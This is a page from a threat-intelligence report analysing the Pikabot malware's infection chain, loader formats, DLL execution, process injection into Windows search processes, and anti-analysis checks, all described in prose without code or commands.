Anti-analysis analysis and main components
The loader
One of the fascinating and frustrating things about new malware is keeping up with its changelog.
Pikabot’s two-step infection chain would usually start with a ZIP attachment to an e-mail, that in most cases holds a JavaScript file (the loader itself) that would execute the second stage upon interaction. The type of loader differs and can be presented as HTA, IMG, PDF or LNK files, which slightly changes the upcoming steps, but the main goal remains the same: getting a malicious DLL and executing it. In most cases, the loader downloads the malicious DLL from an external server using the curl command. Next, the loader executes the resulting DLL using rundll32.exe, usually by calling one of its export functions. The name of the export function changes and might be Crash, Enter, vips, Excpt, or something else entirely.
Pikabot has been undergoing many frequent and rapid changes in the past year, from improving obfuscation techniques being used to the actual processes executed, improving the anti-analysis and detection evasion of the malware. The frequency of changes could be attributed both to the craftiness of the threat actors always on the lookout for the best methods of avoiding detection, but also to the fact that Pikabot is a relatively new malware. Regardless of the driver, the steady output of changes complicates tracking any malware, boosting Pikabot’s evasion portfolio.
Figure 25: 1 Pikabot Infection Chain
The core module injector
The main functionalities are decrypting, injecting, and executing the core module. Later versions of the malware spawn a legitimate looking SearchProtocolHost.exe process to inject the core module.
The core module usually contains anti-analysis code, specifically anti-debug and some virtual machine or sandbox checks, as well as flags for checking the user’s language to avoid infecting victims in Commonwealth of Independent States (CIS) countries, depending on the operator.
In even newer samples, SearchFilterHost.exe is used instead.
62
Made with FlippingBook - PDF hosting